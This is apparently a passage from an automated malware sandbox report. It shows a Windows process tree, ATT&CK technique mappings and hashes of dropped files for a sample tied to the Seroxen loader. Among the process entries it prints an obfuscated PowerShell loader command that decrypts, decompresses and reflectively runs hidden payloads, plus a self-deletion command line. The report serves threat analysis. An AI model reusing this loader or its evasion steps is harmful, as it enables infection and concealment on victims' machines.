                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 464
                                                        6⤵
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:6104
                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{7e5e38b5-3118-4043-9994-5395815059cb}
                                                      5⤵
                                                        PID:3564
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 464
                                                          6⤵
                                                          • Program crash
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          PID:4284
                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{7901d963-cb91-4908-902b-151e01775a48}
                                                        5⤵
                                                          PID:656
                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{46f96e5c-42ea-477a-b067-9a0c62b656ea}
                                                          5⤵
                                                            PID:5776
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1288
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      1⤵
                                                        PID:1348
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        1⤵
                                                          PID:1376
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                          1⤵
                                                            PID:1424
                                                            • C:\Windows\system32\sihost.exe
                                                              sihost.exe
                                                              2⤵
                                                                PID:736
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                              1⤵
                                                                PID:1456
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                1⤵
                                                                  PID:1552
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                  1⤵
                                                                    PID:1564
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                    1⤵
                                                                      PID:1672
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                      1⤵
                                                                        PID:1704
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                        1⤵
                                                                          PID:1744
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                          1⤵
                                                                            PID:1820
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1828
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                              1⤵
                                                                                PID:1940
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1988
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                  1⤵
                                                                                    PID:1996
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                    1⤵
                                                                                      PID:1772
                                                                                    • C:\Windows\System32\spoolsv.exe
                                                                                      C:\Windows\System32\spoolsv.exe
                                                                                      1⤵
                                                                                        PID:2104
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                        1⤵
                                                                                          PID:2180
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                          1⤵
                                                                                          • Checks processor information in registry
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2232
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                          1⤵
                                                                                            PID:2312
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            PID:2360
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2368
                                                                                            • C:\Windows\sysmon.exe
                                                                                              C:\Windows\sysmon.exe
                                                                                              1⤵
                                                                                                PID:2396
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                1⤵
                                                                                                  PID:2428
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                  1⤵
                                                                                                    PID:2440
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                                    1⤵
                                                                                                      PID:2448
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                      1⤵
                                                                                                        PID:2544
                                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:2996
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                          1⤵
                                                                                                            PID:1964
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                            1⤵
                                                                                                              PID:3248
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                              1⤵
                                                                                                                PID:3384
                                                                                                              • C:\Windows\Explorer.EXE
                                                                                                                C:\Windows\Explorer.EXE
                                                                                                                1⤵
                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                PID:3476
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4384
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    3⤵
                                                                                                                      PID:3292
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                                                      "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Checks computer location settings
                                                                                                                      • Deletes itself
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3580
                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{60d4635f-c424-4a64-90bb-8b1326f4102f}
                                                                                                                        4⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2636
                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{c1b24883-ef75-4ed8-88de-0e8b88c244a8}
                                                                                                                        4⤵
                                                                                                                          PID:5220
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit
                                                                                                                          4⤵
                                                                                                                            PID:892
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              5⤵
                                                                                                                                PID:6096
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                PING localhost -n 8
                                                                                                                                5⤵
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:2972
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                                5⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5180
                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                                5⤵
                                                                                                                                • Views/modifies file attributes
                                                                                                                                PID:5756
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                        1⤵
                                                                                                                          PID:3668
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                          1⤵
                                                                                                                            PID:3852
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious use of UnmapMainImage
                                                                                                                            PID:4028
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4196
                                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4920
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                1⤵
                                                                                                                                  PID:4024
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:4896
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1836
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                      1⤵
                                                                                                                                        PID:3412
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                        1⤵
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:4004
                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:2860
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:4296
                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4860
                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:2992
                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:1932
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              PID:816
                                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:4972
                                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:1372
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:2844
                                                                                                                                                • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                  C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:3588
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                  PID:3548
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5336 -ip 5336
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2956
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 640 -p 4452 -ip 4452
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:4912
                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 644 -p 1976 -ip 1976
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:3404
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5736 -ip 5736
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:3780
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3564 -ip 3564
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                      PID:1368
                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2096
                                                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2268
                                                                                                                                                      • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3488

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Hide Artifacts

                                                                                                                                                        1
                                                                                                                                                        T1564

                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                        1
                                                                                                                                                        T1564.001

                                                                                                                                                        Discovery

                                                                                                                                                        Query Registry

                                                                                                                                                        5
                                                                                                                                                        T1012

                                                                                                                                                        System Information Discovery

                                                                                                                                                        5
                                                                                                                                                        T1082

                                                                                                                                                        Remote System Discovery

                                                                                                                                                        1
                                                                                                                                                        T1018

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF608.tmp.csv
                                                                                                                                                          Filesize

                                                                                                                                                          42KB

                                                                                                                                                          MD5

                                                                                                                                                          ce1252e4094e540926f2b6f746541f0f

                                                                                                                                                          SHA1

                                                                                                                                                          25f9d2ccdd1376c79db34d9ef455ca2edda535fb

                                                                                                                                                          SHA256

                                                                                                                                                          6e2b41be1695b8d89fb892d0d93a3d582cf2ab1b07e674ee9e864732f1b40485

                                                                                                                                                          SHA512

                                                                                                                                                          f6a48bc384df2abcd512d04e3dd684c2242576a51dee468e97b4b66bbe3b216b67e4a77d88baeaea387cfaee84a7b9675a5996cb1b932bd63eb930fd1c1b5efd

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF628.tmp.txt
                                                                                                                                                          Filesize

                                                                                                                                                          13KB

                                                                                                                                                          MD5

                                                                                                                                                          9210a32d8005ca5e8b4ba2558de69d0a

                                                                                                                                                          SHA1

                                                                                                                                                          b596502f69e52db178257819cc18f94e6a971dd2

                                                                                                                                                          SHA256

                                                                                                                                                          7533b9447713fcef0ec1ce4e7afd97d06793697a11d2ad0385a319a26aec0d28

                                                                                                                                                          SHA512

                                                                                                                                                          346b7d9f27f1abe78ad13fe6be48c1bfe07f77163db2f4fad0bcd296be7ef8da9036432c1a4279b8ae93fd739506558de1d5f7d71b7d1647f7902228112db0bd

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF639.tmp.csv
                                                                                                                                                          Filesize

                                                                                                                                                          42KB

                                                                                                                                                          MD5

                                                                                                                                                          c41d1d65ff487b932118e6aec933152f

                                                                                                                                                          SHA1

                                                                                                                                                          f70768f8f9adf9ada2ec3aaa931116b4a00276e9

                                                                                                                                                          SHA256

                                                                                                                                                          e230dc8a92d3ba65f00975d79f1374392086c9043c8caf5e7607fce7cc95b341

                                                                                                                                                          SHA512

                                                                                                                                                          c25976fb0065e3a0b6b4a3917876f0e8d76c0a3f0a8d4ae36100b65c5d4226e19d78f6a7249ea10d5b0975183ccc0231f9b739e66dc2ffa328035f8261eb5158

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF669.tmp.txt
                                                                                                                                                          Filesize

                                                                                                                                                          13KB

                                                                                                                                                          MD5

                                                                                                                                                          9abd1a6cc3859f28aa248706a6fb0c2b

                                                                                                                                                          SHA1

                                                                                                                                                          8b878dd51760481de705335da1f37acd0292802f

                                                                                                                                                          SHA256

                                                                                                                                                          bc9849bb9dd04abe3eaebe38060dd7c05c82a2fed8e8f73fdaeac7c109e521c7

                                                                                                                                                          SHA512

                                                                                                                                                          4ab701767051fa3409a11b61cf9ddb2fad9e3fa1d3bc3af7e003a25e79afb301211785758a899b76a9e5f9d1ba2c45014ffc3e8e5c33ec2017d1a8064273b607

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9F4.tmp.csv
                                                                                                                                                          Filesize

                                                                                                                                                          42KB

                                                                                                                                                          MD5

                                                                                                                                                          bf6449e993e4ecd70fb15b4ab81e501b

                                                                                                                                                          SHA1

                                                                                                                                                          ca19b34cab1b4bddfc2b2f711949c1eae1144152

                                                                                                                                                          SHA256

                                                                                                                                                          49558c5defaa64186a6584bbd38c2a015ef3ab6452e7c7417273fec30cb9f1ad

                                                                                                                                                          SHA512

                                                                                                                                                          71dc8f0d441c4b25c50e42b1df1ebebc848cae1dcce2760a1a05a58d5b644f25bf22acfb678b2340cccde8128ed647958e898b36f637209fa86a77f3f37c5073

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA14.tmp.txt
                                                                                                                                                          Filesize

                                                                                                                                                          13KB

                                                                                                                                                          MD5

                                                                                                                                                          6f512d835700bb64b3f333ac8356ccab

                                                                                                                                                          SHA1

                                                                                                                                                          fa3ea03f91eeda4bbb706b787e5cf5b4632dc32a

                                                                                                                                                          SHA256

                                                                                                                                                          8bfc2a553408343a668c288c1f89d13f804379f07065295c3fed90c341f50f9e

                                                                                                                                                          SHA512

                                                                                                                                                          c87a55125aeb94e260bc5a4cb0b75cd42a90de8aa4933f55dc8adb921e083725c644ab927dea2771c99176b4e1a4bbefa445d2d89a373dbf828613390a1d72fd

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBDB.tmp.csv
                                                                                                                                                          Filesize

                                                                                                                                                          42KB

                                                                                                                                                          MD5

                                                                                                                                                          c8674c1f12d60b4dfeb831b201867108

                                                                                                                                                          SHA1

                                                                                                                                                          d19f0a60b94cd2b395ca8c8db0cef9aa31cdf3d3

                                                                                                                                                          SHA256

                                                                                                                                                          77b144d8d1923ce9f974678b407d301d8ea195ef8770d34e86d8d1a4fd1c4cdf

                                                                                                                                                          SHA512

                                                                                                                                                          42939cf564c23fa1fd49adae6175652cb26dd386f520dd5364f5258d9f6249a577c5cd8ef7d1f595612af26cb73d71d49d8463d7fb3092f02bd6cae9cb54b4cb

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC0A.tmp.txt
                                                                                                                                                          Filesize

                                                                                                                                                          13KB

                                                                                                                                                          MD5

                                                                                                                                                          3a092b7e21d4835d6fbe916724829d8a

                                                                                                                                                          SHA1

                                                                                                                                                          eb26aeab2a726c7de3416e3d03a340c4526a7626

                                                                                                                                                          SHA256

                                                                                                                                                          342b5297d32591d5797df4c72dd9a638cc652313707cd35ac678c40e93ffd555

                                                                                                                                                          SHA512

                                                                                                                                                          e15b2624083f6f062ebc749fff2a1f66d3e815eddd053569d936aea51b41792be505209262ded37ddebee38b5cb2380ce8e91e934503cc001586074e978d4374

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC3A.tmp.csv
                                                                                                                                                          Filesize

                                                                                                                                                          40KB

                                                                                                                                                          MD5

                                                                                                                                                          44521d1df46de67a7c6e4b432ea8c31b

                                                                                                                                                          SHA1

                                                                                                                                                          709f10a28391e846f9e0868b0a8d68d831930a00

                                                                                                                                                          SHA256

                                                                                                                                                          5b644194dc7910b17b1ff5ee48080e5b1b96776b2dffefe4602bd2f281d6e147

                                                                                                                                                          SHA512

                                                                                                                                                          4388f40ec1f5cb3d433ed588b0c530d135325c01efcd0881ba3f283545d127113cebf16c3c8b9413a15a255fa9ab04765c65b227a85df4f071fdae4377a48cd5

                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC7A.tmp.txt
                                                                                                                                                          Filesize

                                                                                                                                                          13KB

                                                                                                                                                          MD5

                                                                                                                                                          d91a055bd9b3cb1c8bd5e93b44db7b83

                                                                                                                                                          SHA1

                                                                                                                                                          4139b35f0db271869579e2224417ca4c3adcd3d0

                                                                                                                                                          SHA256

                                                                                                                                                          a8ca93b696511c5d58f9e4d1fbec93ab4575f45fae53bae81239ca8cce319fad

                                                                                                                                                          SHA512

                                                                                                                                                          2bac0fcfd32c7a9191fac72ef74f5cf588566af501a5a25d1da3e35ff4b3cdfd49626f6f348a79740f5225a03c4ee231a492c9b304b4085ee47b8676abbaee53

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                                                                                          Filesize

                                                                                                                                                          442KB

                                                                                                                                                          MD5

                                                                                                                                                          04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                          SHA1

                                                                                                                                                          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                          SHA256

                                                                                                                                                          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                          SHA512

                                                                                                                                                          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lze5d0es.rcb.ps1
                                                                                                                                                          Filesize

                                                                                                                                                          60B

                                                                                                                                                          MD5

                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                          SHA1

                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                          SHA256

                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                          SHA512

                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                        • C:\Windows\$sxr-cmd.exe
                                                                                                                                                          Filesize

                                                                                                                                                          283KB

                                                                                                                                                          MD5

                                                                                                                                                          8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                                          SHA1

                                                                                                                                                          f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                                          SHA256

                                                                                                                                                          b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                                          SHA512

                                                                                                                                                          99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                                        • C:\Windows\$sxr-mshta.exe
                                                                                                                                                          Filesize

                                                                                                                                                          14KB

                                                                                                                                                          MD5

                                                                                                                                                          0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                                          SHA1

                                                                                                                                                          51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                                          SHA256

                                                                                                                                                          dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                                          SHA512

                                                                                                                                                          d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                                        • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
